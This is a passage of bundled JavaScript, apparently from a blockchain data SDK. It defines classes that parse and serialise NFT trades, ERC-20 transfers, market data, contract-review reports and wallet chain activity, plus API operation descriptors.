                return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(operator);
            }),
            logIndex: +data.logIndex
        });
    };
    return EvmNftTransfer;
}();
/**
 * The EvmTransactionLogDecoded class is a MoralisData that references an EVM decoded transaction log.
 *
 * @category DataType
 */ var $3dfc2d9370ba0cd1$export$e876d43b94710cd3 = /** @class */ function(_super) {
    $3dfc2d9370ba0cd1$var$__extends(EvmTransactionLogDecoded, _super);
    function EvmTransactionLogDecoded(value) {
        var _this = _super.call(this, value) || this;
        _this._value = EvmTransactionLogDecoded.parse(value);
        return _this;
    }
    /**
     * Create a new instance of EvmTransactionLogDecoded from any valid address input
     *
     * @example
     * ```
     * const log = EvmTransactionLogDecoded.create(value, core);
     * ```
     * @param value - A valid EvmTransactionLogDecodedish
     */ EvmTransactionLogDecoded.create = function(value) {
        if (value instanceof EvmTransactionLogDecoded) return value;
        return new EvmTransactionLogDecoded(value);
    };
    EvmTransactionLogDecoded.parse = function(value) {
        var data = _super.parse.call(this, value);
        return $3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, data), {
            decodedEvent: value.decodedEvent
        });
    };
    Object.defineProperty(EvmTransactionLogDecoded.prototype, "decodedEvent", {
        get: function() {
            return this._value.decodedEvent;
        },
        enumerable: false,
        configurable: true
    });
    return EvmTransactionLogDecoded;
}($3dfc2d9370ba0cd1$export$138ade50fb8052f5);
/**
 * The EvmTransactionVerbose is a representation of a published transaction.
 *
 * Use this class any time you work with a transaction.
 *
 * @category DataType
 */ var $3dfc2d9370ba0cd1$export$36d7fa6a4ed9819e = /** @class */ function(_super) {
    $3dfc2d9370ba0cd1$var$__extends(EvmTransactionVerbose, _super);
    function EvmTransactionVerbose(data) {
        var _this = _super.call(this, data) || this;
        _this._data = EvmTransactionVerbose.parse(data);
        return _this;
    }
    /**
     * Create a new instance of EvmTransactionVerbose from any valid transaction input
     * @param data - the EvmTransactionVerboseish type
     * @example
     * ```
     * const transaction = EvmTransactionVerbose.create(data);
     *```
     */ EvmTransactionVerbose.create = function(data) {
        if (data instanceof EvmTransactionVerbose) return data;
        return new EvmTransactionVerbose(data);
    };
    Object.defineProperty(EvmTransactionVerbose.prototype, "decodedCall", {
        get: function() {
            return this._data.decodedCall;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmTransactionVerbose.prototype, "logs", {
        get: function() {
            return this._data.logs;
        },
        enumerable: false,
        configurable: true
    });
    var _a;
    _a = EvmTransactionVerbose;
    EvmTransactionVerbose.parse = function(data) {
        var parsed = _super.parse.call(_a, data);
        return $3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, parsed), {
            logs: data.logs.map(function(log) {
                return $3dfc2d9370ba0cd1$export$e876d43b94710cd3.create(log);
            }),
            decodedCall: data.decodedCall
        });
    };
    return EvmTransactionVerbose;
}($3dfc2d9370ba0cd1$export$1ecb3c5cbbcf4bef);
var $3dfc2d9370ba0cd1$export$af80c79c3efd2de2 = /** @class */ function() {
    function EvmTrade(input) {
        this.transactionHash = input.transactionHash;
        this.transactionIndex = input.transactionIndex;
        this.tokenIds = input.tokenIds;
        this.sellerAddress = $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(input.sellerAddress);
        this.buyerAddress = $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(input.buyerAddress);
        this.tokenAddress = $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(input.tokenAddress);
        this.marketplaceAddress = $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(input.marketplaceAddress);
        this.priceTokenAddress = input.priceTokenAddress ? $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(input.priceTokenAddress) : undefined;
        this.price = $3dfc2d9370ba0cd1$export$62862bdd1f71aa78.create(input.price);
        this.blockTimestamp = input.blockTimestamp;
        this.blockNumber = (0, $10891f2cb3e98601$export$d97aa349ed20696).create(input.blockNumber);
        this.blockHash = input.blockHash;
    }
    EvmTrade.create = function(input) {
        if (input instanceof EvmTrade) return input;
        return new EvmTrade(input);
    };
    EvmTrade.fromJSON = function(json) {
        var input = {
            transactionHash: json.transaction_hash,
            transactionIndex: Number(json.transaction_index),
            tokenIds: json.token_ids,
            sellerAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.fromJSON(json.seller_address),
            buyerAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.fromJSON(json.buyer_address),
            tokenAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.fromJSON(json.token_address),
            marketplaceAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.fromJSON(json.marketplace_address),
            priceTokenAddress: json.price_token_address ? $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.fromJSON(json.price_token_address) : undefined,
            price: $3dfc2d9370ba0cd1$export$62862bdd1f71aa78.fromJSON(json.price),
            blockTimestamp: new Date(json.block_timestamp),
            blockNumber: (0, $10891f2cb3e98601$export$d97aa349ed20696).fromJSON(json.block_number),
            blockHash: json.block_hash
        };
        return EvmTrade.create(input);
    };
    EvmTrade.prototype.toJSON = function() {
        return {
            transaction_hash: this.transactionHash,
            transaction_index: String(this.transactionIndex),
            token_ids: this.tokenIds,
            seller_address: this.sellerAddress.toJSON(),
            buyer_address: this.buyerAddress.toJSON(),
            token_address: this.tokenAddress.toJSON(),
            marketplace_address: this.marketplaceAddress.toJSON(),
            price_token_address: this.priceTokenAddress ? this.priceTokenAddress.toJSON() : undefined,
            price: this.price.toJSON(),
            block_timestamp: this.blockTimestamp.toISOString(),
            block_number: this.blockNumber.toJSON(),
            block_hash: this.blockHash
        };
    };
    return EvmTrade;
}();
var $3dfc2d9370ba0cd1$export$f588ec9ebba6adbd = /** @class */ function() {
    function EvmTradeCollection(input) {
        this.total = input.total;
        this.page = input.page;
        this.pageSize = input.pageSize;
        this.cursor = input.cursor;
        this.result = input.result.map(function(item) {
            return $3dfc2d9370ba0cd1$export$af80c79c3efd2de2.create(item);
        });
    }
    EvmTradeCollection.create = function(input) {
        if (input instanceof EvmTradeCollection) return input;
        return new EvmTradeCollection(input);
    };
    EvmTradeCollection.fromJSON = function(json) {
        var input = {
            total: json.total,
            page: json.page,
            pageSize: json.page_size,
            cursor: json.cursor,
            result: json.result.map(function(item) {
                return $3dfc2d9370ba0cd1$export$af80c79c3efd2de2.fromJSON(item);
            })
        };
        return EvmTradeCollection.create(input);
    };
    EvmTradeCollection.prototype.toJSON = function() {
        return {
            total: this.total,
            page: this.page,
            page_size: this.pageSize,
            cursor: this.cursor,
            result: this.result.map(function(item) {
                return item.toJSON();
            })
        };
    };
    return EvmTradeCollection;
}();
// $ref: #/components/schemas/erc20Transfer/properties/from_wallet_label
// typeName: erc20Transfer_from_wallet_label
// unionType: oneOf
var $3dfc2d9370ba0cd1$export$9863bc00a0fafa55 = /** @class */ function() {
    function EvmErc20TransferFromWalletLabel() {}
    EvmErc20TransferFromWalletLabel.create = function(input) {
        return input;
    };
    EvmErc20TransferFromWalletLabel.fromJSON = function(json) {
        return json;
    };
    EvmErc20TransferFromWalletLabel.toJSON = function(value) {
        return value;
    };
    return EvmErc20TransferFromWalletLabel;
}();
// $ref: #/components/schemas/erc20Transfer/properties/to_wallet_label
// typeName: erc20Transfer_to_wallet_label
// unionType: oneOf
var $3dfc2d9370ba0cd1$export$736865bb6ca94c24 = /** @class */ function() {
    function EvmErc20TransferToWalletLabel() {}
    EvmErc20TransferToWalletLabel.create = function(input) {
        return input;
    };
    EvmErc20TransferToWalletLabel.fromJSON = function(json) {
        return json;
    };
    EvmErc20TransferToWalletLabel.toJSON = function(value) {
        return value;
    };
    return EvmErc20TransferToWalletLabel;
}();
var $3dfc2d9370ba0cd1$export$3c03bf5de5113cba = /** @class */ function() {
    function EvmErc20Transfer(input) {
        this.tokenName = input.tokenName;
        this.tokenSymbol = input.tokenSymbol;
        this.tokenLogo = input.tokenLogo;
        this.tokenDecimals = input.tokenDecimals;
        this.contractAddress = $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(input.contractAddress);
        this.transactionHash = input.transactionHash;
        this.transactionIndex = input.transactionIndex;
        this.logIndex = input.logIndex;
        this.blockTimestamp = input.blockTimestamp;
        this.blockNumber = (0, $10891f2cb3e98601$export$d97aa349ed20696).create(input.blockNumber);
        this.blockHash = input.blockHash;
        this.fromWallet = $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(input.fromWallet);
        this.fromWalletLabel = input.fromWalletLabel ? $3dfc2d9370ba0cd1$export$9863bc00a0fafa55.create(input.fromWalletLabel) : undefined;
        this.toWallet = $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(input.toWallet);
        this.toWalletLabel = input.toWalletLabel ? $3dfc2d9370ba0cd1$export$736865bb6ca94c24.create(input.toWalletLabel) : undefined;
        this.value = input.value;
        this.valueDecimal = input.valueDecimal;
        this.possibleSpam = input.possibleSpam;
    }
    EvmErc20Transfer.create = function(input) {
        if (input instanceof EvmErc20Transfer) return input;
        return new EvmErc20Transfer(input);
    };
    EvmErc20Transfer.fromJSON = function(json) {
        var input = {
            tokenName: json.token_name,
            tokenSymbol: json.token_symbol,
            tokenLogo: json.token_logo,
            tokenDecimals: Number(json.token_decimals),
            contractAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.fromJSON(json.contract_address),
            transactionHash: json.transaction_hash,
            transactionIndex: Number(json.transaction_index),
            logIndex: Number(json.log_index),
            blockTimestamp: new Date(json.block_timestamp),
            blockNumber: (0, $10891f2cb3e98601$export$d97aa349ed20696).fromJSON(json.block_number),
            blockHash: json.block_hash,
            fromWallet: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.fromJSON(json.from_wallet),
            fromWalletLabel: json.from_wallet_label ? $3dfc2d9370ba0cd1$export$9863bc00a0fafa55.fromJSON(json.from_wallet_label) : undefined,
            toWallet: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.fromJSON(json.to_wallet),
            toWalletLabel: json.to_wallet_label ? $3dfc2d9370ba0cd1$export$736865bb6ca94c24.fromJSON(json.to_wallet_label) : undefined,
            value: json.value,
            valueDecimal: json.value_decimal,
            possibleSpam: json.possible_spam
        };
        return EvmErc20Transfer.create(input);
    };
    EvmErc20Transfer.prototype.toJSON = function() {
        return {
            token_name: this.tokenName,
            token_symbol: this.tokenSymbol,
            token_logo: this.tokenLogo,
            token_decimals: String(this.tokenDecimals),
            contract_address: this.contractAddress.toJSON(),
            transaction_hash: this.transactionHash,
            transaction_index: String(this.transactionIndex),
            log_index: String(this.logIndex),
            block_timestamp: this.blockTimestamp.toISOString(),
            block_number: this.blockNumber.toJSON(),
            block_hash: this.blockHash,
            from_wallet: this.fromWallet.toJSON(),
            from_wallet_label: this.fromWalletLabel ? $3dfc2d9370ba0cd1$export$9863bc00a0fafa55.toJSON(this.fromWalletLabel) : undefined,
            to_wallet: this.toWallet.toJSON(),
            to_wallet_label: this.toWalletLabel ? $3dfc2d9370ba0cd1$export$736865bb6ca94c24.toJSON(this.toWalletLabel) : undefined,
            value: this.value,
            value_decimal: this.valueDecimal,
            possible_spam: this.possibleSpam
        };
    };
    return EvmErc20Transfer;
}();
var $3dfc2d9370ba0cd1$export$405e9b1e4ed40d1b = /** @class */ function() {
    function EvmErc20TransfersResponse(input) {
        this.cursor = input.cursor;
        this.result = input.result.map(function(item) {
            return $3dfc2d9370ba0cd1$export$3c03bf5de5113cba.create(item);
        });
    }
    EvmErc20TransfersResponse.create = function(input) {
        if (input instanceof EvmErc20TransfersResponse) return input;
        return new EvmErc20TransfersResponse(input);
    };
    EvmErc20TransfersResponse.fromJSON = function(json) {
        var input = {
            cursor: json.cursor,
            result: json.result.map(function(item) {
                return $3dfc2d9370ba0cd1$export$3c03bf5de5113cba.fromJSON(item);
            })
        };
        return EvmErc20TransfersResponse.create(input);
    };
    EvmErc20TransfersResponse.prototype.toJSON = function() {
        return {
            cursor: this.cursor,
            result: this.result.map(function(item) {
                return item.toJSON();
            })
        };
    };
    return EvmErc20TransfersResponse;
}();
// $ref: #/components/schemas/web3version
// type: web3version
// properties:
// - version ($ref: #/components/schemas/web3version/properties/version)
var $3dfc2d9370ba0cd1$export$d0fcf1693976fcc1 = /** @class */ function() {
    function EvmWeb3version(input) {
        this.version = input.version;
    }
    EvmWeb3version.create = function(input) {
        if (input instanceof EvmWeb3version) return input;
        return new EvmWeb3version(input);
    };
    EvmWeb3version.fromJSON = function(json) {
        var input = {
            version: json.version
        };
        return EvmWeb3version.create(input);
    };
    EvmWeb3version.prototype.toJSON = function() {
        return {
            version: this.version
        };
    };
    return EvmWeb3version;
}();
// $ref: #/components/schemas/endpointWeights
// type: endpointWeights
// properties:
// - endpoint ($ref: #/components/schemas/endpointWeights/properties/endpoint)
// - path ($ref: #/components/schemas/endpointWeights/properties/path)
// - rateLimitCost ($ref: #/components/schemas/endpointWeights/properties/rateLimitCost)
// - price ($ref: #/components/schemas/endpointWeights/properties/price)
var $3dfc2d9370ba0cd1$export$7fc3ae096eab6610 = /** @class */ function() {
    function EvmEndpointWeights(input) {
        this.endpoint = input.endpoint;
        this.path = input.path;
        this.rateLimitCost = input.rateLimitCost;
        this.price = input.price;
    }
    EvmEndpointWeights.create = function(input) {
        if (input instanceof EvmEndpointWeights) return input;
        return new EvmEndpointWeights(input);
    };
    EvmEndpointWeights.fromJSON = function(json) {
        var input = {
            endpoint: json.endpoint,
            path: json.path,
            rateLimitCost: json.rateLimitCost,
            price: json.price
        };
        return EvmEndpointWeights.create(input);
    };
    EvmEndpointWeights.prototype.toJSON = function() {
        return {
            endpoint: this.endpoint,
            path: this.path,
            rateLimitCost: this.rateLimitCost,
            price: this.price
        };
    };
    return EvmEndpointWeights;
}();
var $3dfc2d9370ba0cd1$export$a68bc4978c05df0e = /** @class */ function() {
    function EvmMarketDataERC20TokenItem(input) {
        this.rank = input.rank;
        this.tokenName = input.tokenName;
        this.tokenSymbol = input.tokenSymbol;
        this.tokenLogo = input.tokenLogo;
        this.tokenDecimals = input.tokenDecimals;
        this.contractAddress = $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(input.contractAddress);
        this.priceUsd = input.priceUsd;
        this.price24hPercentChange = input.price24hPercentChange;
        this.price7dPercentChange = input.price7dPercentChange;
        this.marketCapUsd = input.marketCapUsd;
    }
    EvmMarketDataERC20TokenItem.create = function(input) {
        if (input instanceof EvmMarketDataERC20TokenItem) return input;
        return new EvmMarketDataERC20TokenItem(input);
    };
    EvmMarketDataERC20TokenItem.fromJSON = function(json) {
        var input = {
            rank: json.rank,
            tokenName: json.token_name,
            tokenSymbol: json.token_symbol,
            tokenLogo: json.token_logo,
            tokenDecimals: Number(json.token_decimals),
            contractAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.fromJSON(json.contract_address),
            priceUsd: json.price_usd,
            price24hPercentChange: json.price_24h_percent_change,
            price7dPercentChange: json.price_7d_percent_change,
            marketCapUsd: json.market_cap_usd
        };
        return EvmMarketDataERC20TokenItem.create(input);
    };
    EvmMarketDataERC20TokenItem.prototype.toJSON = function() {
        return {
            rank: this.rank,
            token_name: this.tokenName,
            token_symbol: this.tokenSymbol,
            token_logo: this.tokenLogo,
            token_decimals: String(this.tokenDecimals),
            contract_address: this.contractAddress.toJSON(),
            price_usd: this.priceUsd,
            price_24h_percent_change: this.price24hPercentChange,
            price_7d_percent_change: this.price7dPercentChange,
            market_cap_usd: this.marketCapUsd
        };
    };
    return EvmMarketDataERC20TokenItem;
}();
var $3dfc2d9370ba0cd1$export$734e7dac14680bbb = /** @class */ function() {
    function EvmMarketDataERC20TokensByPriceMovers(input) {
        this.gainers = input.gainers.map(function(item) {
            return $3dfc2d9370ba0cd1$export$a68bc4978c05df0e.create(item);
        });
        this.losers = input.losers.map(function(item) {
            return $3dfc2d9370ba0cd1$export$a68bc4978c05df0e.create(item);
        });
    }
    EvmMarketDataERC20TokensByPriceMovers.create = function(input) {
        if (input instanceof EvmMarketDataERC20TokensByPriceMovers) return input;
        return new EvmMarketDataERC20TokensByPriceMovers(input);
    };
    EvmMarketDataERC20TokensByPriceMovers.fromJSON = function(json) {
        var input = {
            gainers: json.gainers.map(function(item) {
                return $3dfc2d9370ba0cd1$export$a68bc4978c05df0e.fromJSON(item);
            }),
            losers: json.losers.map(function(item) {
                return $3dfc2d9370ba0cd1$export$a68bc4978c05df0e.fromJSON(item);
            })
        };
        return EvmMarketDataERC20TokensByPriceMovers.create(input);
    };
    EvmMarketDataERC20TokensByPriceMovers.prototype.toJSON = function() {
        return {
            gainers: this.gainers.map(function(item) {
                return item.toJSON();
            }),
            losers: this.losers.map(function(item) {
                return item.toJSON();
            })
        };
    };
    return EvmMarketDataERC20TokensByPriceMovers;
}();
// $ref: #/components/schemas/marketDataTopNFTCollectionByMarketCap/items
// type: marketDataTopNFTCollectionByMarketCap_Item
// properties:
// - rank ($ref: #/components/schemas/marketDataTopNFTCollectionByMarketCap/items/properties/rank)
// - collection_title ($ref: #/components/schemas/marketDataTopNFTCollectionByMarketCap/items/properties/collection_title)
// - collection_image ($ref: #/components/schemas/marketDataTopNFTCollectionByMarketCap/items/properties/collection_image)
// - floor_price_usd ($ref: #/components/schemas/marketDataTopNFTCollectionByMarketCap/items/properties/floor_price_usd)
// - floor_price_24hr_percent_change ($ref: #/components/schemas/marketDataTopNFTCollectionByMarketCap/items/properties/floor_price_24hr_percent_change)
// - market_cap_usd ($ref: #/components/schemas/marketDataTopNFTCollectionByMarketCap/items/properties/market_cap_usd)
// - market_cap_24hr_percent_change ($ref: #/components/schemas/marketDataTopNFTCollectionByMarketCap/items/properties/market_cap_24hr_percent_change)
// - volume_usd ($ref: #/components/schemas/marketDataTopNFTCollectionByMarketCap/items/properties/volume_usd)
// - volume_24hr_percent_change ($ref: #/components/schemas/marketDataTopNFTCollectionByMarketCap/items/properties/volume_24hr_percent_change)
var $3dfc2d9370ba0cd1$export$fc0a27605b96ed0d = /** @class */ function() {
    function EvmMarketDataTopNFTCollectionByMarketCapItem(input) {
        this.rank = input.rank;
        this.collectionTitle = input.collectionTitle;
        this.collectionImage = input.collectionImage;
        this.floorPriceUsd = input.floorPriceUsd;
        this.floorPrice24hrPercentChange = input.floorPrice24hrPercentChange;
        this.marketCapUsd = input.marketCapUsd;
        this.marketCap24hrPercentChange = input.marketCap24hrPercentChange;
        this.volumeUsd = input.volumeUsd;
        this.volume24hrPercentChange = input.volume24hrPercentChange;
    }
    EvmMarketDataTopNFTCollectionByMarketCapItem.create = function(input) {
        if (input instanceof EvmMarketDataTopNFTCollectionByMarketCapItem) return input;
        return new EvmMarketDataTopNFTCollectionByMarketCapItem(input);
    };
    EvmMarketDataTopNFTCollectionByMarketCapItem.fromJSON = function(json) {
        var input = {
            rank: json.rank,
            collectionTitle: json.collection_title,
            collectionImage: json.collection_image,
            floorPriceUsd: json.floor_price_usd,
            floorPrice24hrPercentChange: json.floor_price_24hr_percent_change,
            marketCapUsd: json.market_cap_usd,
            marketCap24hrPercentChange: json.market_cap_24hr_percent_change,
            volumeUsd: json.volume_usd,
            volume24hrPercentChange: json.volume_24hr_percent_change
        };
        return EvmMarketDataTopNFTCollectionByMarketCapItem.create(input);
    };
    EvmMarketDataTopNFTCollectionByMarketCapItem.prototype.toJSON = function() {
        return {
            rank: this.rank,
            collection_title: this.collectionTitle,
            collection_image: this.collectionImage,
            floor_price_usd: this.floorPriceUsd,
            floor_price_24hr_percent_change: this.floorPrice24hrPercentChange,
            market_cap_usd: this.marketCapUsd,
            market_cap_24hr_percent_change: this.marketCap24hrPercentChange,
            volume_usd: this.volumeUsd,
            volume_24hr_percent_change: this.volume24hrPercentChange
        };
    };
    return EvmMarketDataTopNFTCollectionByMarketCapItem;
}();
// $ref: #/components/schemas/marketDataHottestNFTCollectionByTradingVolume/items
// type: marketDataHottestNFTCollectionByTradingVolume_Item
// properties:
// - rank ($ref: #/components/schemas/marketDataHottestNFTCollectionByTradingVolume/items/properties/rank)
// - collection_title ($ref: #/components/schemas/marketDataHottestNFTCollectionByTradingVolume/items/properties/collection_title)
// - collection_image ($ref: #/components/schemas/marketDataHottestNFTCollectionByTradingVolume/items/properties/collection_image)
// - floor_price_usd ($ref: #/components/schemas/marketDataHottestNFTCollectionByTradingVolume/items/properties/floor_price_usd)
// - floor_price_24hr_percent_change ($ref: #/components/schemas/marketDataHottestNFTCollectionByTradingVolume/items/properties/floor_price_24hr_percent_change)
// - volume_usd ($ref: #/components/schemas/marketDataHottestNFTCollectionByTradingVolume/items/properties/volume_usd)
// - volume_24hr_percent_change ($ref: #/components/schemas/marketDataHottestNFTCollectionByTradingVolume/items/properties/volume_24hr_percent_change)
// - average_price_usd ($ref: #/components/schemas/marketDataHottestNFTCollectionByTradingVolume/items/properties/average_price_usd)
var $3dfc2d9370ba0cd1$export$42fec8dce66208c3 = /** @class */ function() {
    function EvmMarketDataHottestNFTCollectionByTradingVolumeItem(input) {
        this.rank = input.rank;
        this.collectionTitle = input.collectionTitle;
        this.collectionImage = input.collectionImage;
        this.floorPriceUsd = input.floorPriceUsd;
        this.floorPrice24hrPercentChange = input.floorPrice24hrPercentChange;
        this.volumeUsd = input.volumeUsd;
        this.volume24hrPercentChange = input.volume24hrPercentChange;
        this.averagePriceUsd = input.averagePriceUsd;
    }
    EvmMarketDataHottestNFTCollectionByTradingVolumeItem.create = function(input) {
        if (input instanceof EvmMarketDataHottestNFTCollectionByTradingVolumeItem) return input;
        return new EvmMarketDataHottestNFTCollectionByTradingVolumeItem(input);
    };
    EvmMarketDataHottestNFTCollectionByTradingVolumeItem.fromJSON = function(json) {
        var input = {
            rank: json.rank,
            collectionTitle: json.collection_title,
            collectionImage: json.collection_image,
            floorPriceUsd: json.floor_price_usd,
            floorPrice24hrPercentChange: json.floor_price_24hr_percent_change,
            volumeUsd: json.volume_usd,
            volume24hrPercentChange: json.volume_24hr_percent_change,
            averagePriceUsd: json.average_price_usd
        };
        return EvmMarketDataHottestNFTCollectionByTradingVolumeItem.create(input);
    };
    EvmMarketDataHottestNFTCollectionByTradingVolumeItem.prototype.toJSON = function() {
        return {
            rank: this.rank,
            collection_title: this.collectionTitle,
            collection_image: this.collectionImage,
            floor_price_usd: this.floorPriceUsd,
            floor_price_24hr_percent_change: this.floorPrice24hrPercentChange,
            volume_usd: this.volumeUsd,
            volume_24hr_percent_change: this.volume24hrPercentChange,
            average_price_usd: this.averagePriceUsd
        };
    };
    return EvmMarketDataHottestNFTCollectionByTradingVolumeItem;
}();
// $ref: #/paths/~1contracts-review/post/responses/200/content/application~1json/schema
// type: reviewContracts
// properties:
// - message ($ref: #/paths/~1contracts-review/post/responses/200/content/application~1json/schema/properties/message)
var $3dfc2d9370ba0cd1$export$c02aed079bd1558e = /** @class */ function() {
    function EvmReviewContracts(input) {
        this.message = input.message;
    }
    EvmReviewContracts.create = function(input) {
        if (input instanceof EvmReviewContracts) return input;
        return new EvmReviewContracts(input);
    };
    EvmReviewContracts.fromJSON = function(json) {
        var input = {
            message: json.message
        };
        return EvmReviewContracts.create(input);
    };
    EvmReviewContracts.prototype.toJSON = function() {
        return {
            message: this.message
        };
    };
    return EvmReviewContracts;
}();
var $3dfc2d9370ba0cd1$export$ef40e1e453f84798 = /** @class */ function() {
    function EvmContractsReviewItem(input) {
        this.contractAddress = $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(input.contractAddress);
        this.reason = input.reason;
        this.reportType = $3dfc2d9370ba0cd1$export$c968a902019a93c4.create(input.reportType);
        this.contractType = $3dfc2d9370ba0cd1$export$5380f06018e84a7e.create(input.contractType);
    }
    EvmContractsReviewItem.create = function(input) {
        if (input instanceof EvmContractsReviewItem) return input;
        return new EvmContractsReviewItem(input);
    };
    EvmContractsReviewItem.fromJSON = function(json) {
        var input = {
            contractAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.fromJSON(json.contract_address),
            reason: json.reason,
            reportType: $3dfc2d9370ba0cd1$export$c968a902019a93c4.fromJSON(json.report_type),
            contractType: $3dfc2d9370ba0cd1$export$5380f06018e84a7e.fromJSON(json.contract_type)
        };
        return EvmContractsReviewItem.create(input);
    };
    EvmContractsReviewItem.prototype.toJSON = function() {
        return {
            contract_address: this.contractAddress.toJSON(),
            reason: this.reason,
            report_type: this.reportType,
            contract_type: this.contractType
        };
    };
    return EvmContractsReviewItem;
}();
var $3dfc2d9370ba0cd1$export$b0273f0bf3517c7a = /** @class */ function() {
    function EvmContractsReviewDto(input) {
        this.contracts = input.contracts.map(function(item) {
            return $3dfc2d9370ba0cd1$export$ef40e1e453f84798.create(item);
        });
    }
    EvmContractsReviewDto.create = function(input) {
        if (input instanceof EvmContractsReviewDto) return input;
        return new EvmContractsReviewDto(input);
    };
    EvmContractsReviewDto.fromJSON = function(json) {
        var input = {
            contracts: json.contracts.map(function(item) {
                return $3dfc2d9370ba0cd1$export$ef40e1e453f84798.fromJSON(item);
            })
        };
        return EvmContractsReviewDto.create(input);
    };
    EvmContractsReviewDto.prototype.toJSON = function() {
        return {
            contracts: this.contracts.map(function(item) {
                return item.toJSON();
            })
        };
    };
    return EvmContractsReviewDto;
}();
var $3dfc2d9370ba0cd1$export$b18048c249759bf3 = /** @class */ function() {
    function EvmTransactionTimestamp(input) {
        this.blockNumber = (0, $10891f2cb3e98601$export$d97aa349ed20696).create(input.blockNumber);
        this.blockTimestamp = input.blockTimestamp;
        this.transactionHash = input.transactionHash;
    }
    EvmTransactionTimestamp.create = function(input) {
        if (input instanceof EvmTransactionTimestamp) return input;
        return new EvmTransactionTimestamp(input);
    };
    EvmTransactionTimestamp.fromJSON = function(json) {
        var input = {
            blockNumber: (0, $10891f2cb3e98601$export$d97aa349ed20696).fromJSON(json.block_number),
            blockTimestamp: json.block_timestamp,
            transactionHash: json.transaction_hash
        };
        return EvmTransactionTimestamp.create(input);
    };
    EvmTransactionTimestamp.prototype.toJSON = function() {
        return {
            block_number: this.blockNumber.toJSON(),
            block_timestamp: this.blockTimestamp,
            transaction_hash: this.transactionHash
        };
    };
    return EvmTransactionTimestamp;
}();
var $3dfc2d9370ba0cd1$export$8b20c59a2f121fae = /** @class */ function() {
    function EvmWalletActiveChain(input) {
        this.chain = input.chain;
        this.chainId = input.chainId;
        this.firstTransaction = input.firstTransaction ? $3dfc2d9370ba0cd1$export$b18048c249759bf3.create(input.firstTransaction) : undefined;
        this.lastTransaction = input.lastTransaction ? $3dfc2d9370ba0cd1$export$b18048c249759bf3.create(input.lastTransaction) : undefined;
    }
    EvmWalletActiveChain.create = function(input) {
        if (input instanceof EvmWalletActiveChain) return input;
        return new EvmWalletActiveChain(input);
    };
    EvmWalletActiveChain.fromJSON = function(json) {
        var input = {
            chain: json.chain,
            chainId: json.chain_id,
            firstTransaction: json.first_transaction ? $3dfc2d9370ba0cd1$export$b18048c249759bf3.fromJSON(json.first_transaction) : undefined,
            lastTransaction: json.last_transaction ? $3dfc2d9370ba0cd1$export$b18048c249759bf3.fromJSON(json.last_transaction) : undefined
        };
        return EvmWalletActiveChain.create(input);
    };
    EvmWalletActiveChain.prototype.toJSON = function() {
        return {
            chain: this.chain,
            chain_id: this.chainId,
            first_transaction: this.firstTransaction ? this.firstTransaction.toJSON() : undefined,
            last_transaction: this.lastTransaction ? this.lastTransaction.toJSON() : undefined
        };
    };
    return EvmWalletActiveChain;
}();
var $3dfc2d9370ba0cd1$export$f17875aee2d3a4af = /** @class */ function() {
    function EvmWalletActiveChains(input) {
        this.address = input.address;
        this.activeChains = input.activeChains.map(function(item) {
            return $3dfc2d9370ba0cd1$export$8b20c59a2f121fae.create(item);
        });
    }
    EvmWalletActiveChains.create = function(input) {
        if (input instanceof EvmWalletActiveChains) return input;
        return new EvmWalletActiveChains(input);
    };
    EvmWalletActiveChains.fromJSON = function(json) {
        var input = {
            address: json.address,
            activeChains: json.active_chains.map(function(item) {
                return $3dfc2d9370ba0cd1$export$8b20c59a2f121fae.fromJSON(item);
            })
        };
        return EvmWalletActiveChains.create(input);
    };
    EvmWalletActiveChains.prototype.toJSON = function() {
        return {
            address: this.address,
            active_chains: this.activeChains.map(function(item) {
                return item.toJSON();
            })
        };
    };
    return EvmWalletActiveChains;
}();
var $3dfc2d9370ba0cd1$export$b9e67fc8a4e7b76d = {
    operationId: "getNFTTrades",
    groupName: "nft",
    httpMethod: "get",
    routePattern: "/nft/{address}/trades",
    parameterNames: [
        "chain",
        "from_block",
        "to_block",
        "from_date",
        "to_date",
        "marketplace",
        "cursor",
        "limit",
        "disable_total",
        "address"
    ],
    hasResponse: true,
    hasBody: false,
    parseResponse: function(json) {
        return $3dfc2d9370ba0cd1$export$f588ec9ebba6adbd.fromJSON(json);
    },
    serializeRequest: function(request) {
        var chain = request.chain ? $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(request.chain) : undefined;
        var fromBlock = request.fromBlock;
        var toBlock = request.toBlock;
        var fromDate = request.fromDate;
        var toDate = request.toDate;
        var marketplace = request.marketplace ? $3dfc2d9370ba0cd1$export$ae23353d645c745.create(request.marketplace) : undefined;
        var cursor = request.cursor;
        var limit = request.limit;
        var disableTotal = request.disableTotal;
        var address = $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address);
        return {
            chain: chain ? chain.toJSON() : undefined,
            from_block: fromBlock,
            to_block: toBlock,
            from_date: fromDate,
            to_date: toDate,
            marketplace: marketplace ? marketplace : undefined,
            cursor: cursor,
            limit: limit,
            disable_total: disableTotal,
            address: address.toJSON()
        };
    }
};
var $3dfc2d9370ba0cd1$export$e128930172c10f7e = {
    operationId: "getErc20Transfers",
    groupName: "token",
    httpMethod: "get",
    routePattern: "/erc20/transfers",
    parameterNames: [
        "chain",
        "from_block",
